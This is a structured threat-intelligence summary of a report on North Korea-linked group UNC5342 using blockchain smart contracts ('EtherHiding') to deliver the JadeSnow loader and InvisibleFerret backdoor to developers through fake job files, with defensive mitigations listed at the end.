Full Report
Google security researchers said on Thursday that they observed a Pyongyang-backed hacking group, tracked as UNC5342, deploying a method known as EtherHiding — a way of embedding malicious code inside smart contracts on decentralized networks such as Ethereum and BNB Smart Chain.
Analysis Summary
# Threat Actor: UNC5342
## Attribution & Identity
* **Attribution:** North Korean state-linked hacking group.
* **Known Aliases/Associations:** Mentioned alongside UNC5142, which previously used the EtherHiding technique for financially motivated goals (this is the first state-sponsored adoption).
## Activity Summary
* Since February (of the time of the report), UNC5342 has been conducting social-engineering campaigns to deliver cryptocurrency-stealing malware.
* The core of the campaign involves luring developers (often in the cryptocurrency or tech industries) by presenting job-related files or coding challenges.
* They are pioneering the use of **EtherHiding**—embedding malicious code within smart contracts on public blockchains (e.g., Ethereum, BNB Smart Chain).
* Google researchers observed this as the first known instance of a nation-state adopting this blockchain-based malware delivery method.
## Tactics, Techniques & Procedures
* **C2/Delivery:** Utilizing public blockchains (like Ethereum and BNB Smart Chain) to host malicious code via smart contracts, providing "next-generation bulletproof hosting."
* **Execution:** Once a target opens a malicious file, a script contacts a smart contract on the blockchain to retrieve encrypted code.
* **Payload Delivery:** Deploys the **JadeSnow** loader, which subsequently installs the **InvisibleFerret** backdoor.
* **Evasion/Persistence:** Malware stored on decentralized ledgers cannot be traditionally blocked or removed. Attackers can quietly update or replace malware by modifying the smart contract.
* **Anonymity:** Leveraging the pseudonymous nature of blockchains.
* **Interaction:** While code is stored on permissionless blockchains, the attackers still interact via centralized web services that defenders might monitor or block.
## Targeting
* **Sectors:** Cryptocurrency and Technology industries (due to targeting developers).
* **Geography:** Not explicitly stated, but likely aiming for global cryptocurrency theft opportunities.
* **Victims:** Developers working in relevant industries who are tricked into downloading malicious job-related files or coding challenges.
## Tools & Infrastructure
* **Malware families used:** JadeSnow (loader), InvisibleFerret (persistent backdoor).
* **Infrastructure:** Public blockchains (Ethereum, BNB Smart Chain) used for code storage via smart contracts. Centralized web services used for interaction alongside the blockchain.
## Implications
* This represents a significant evolution in North Korean cyber operations, moving to leverage decentralization (blockchain) for infrastructure resilience, making takedowns significantly harder for law enforcement and security researchers.
* The objective is large-scale financial gain through cryptocurrency theft.
## Mitigations
* Focus on monitoring or blocking the centralized web services used by the actors to interact with the blockchain infrastructure.
* Increased vigilance against social engineering attempts targeting developers that involve job-related files or coding challenges, especially those involving external resource retrieval (even from seemingly legitimate sources like blockchain contracts).
* Defenders in the cryptocurrency space should focus on deep monitoring of smart contract activity for anomalous code execution pathways.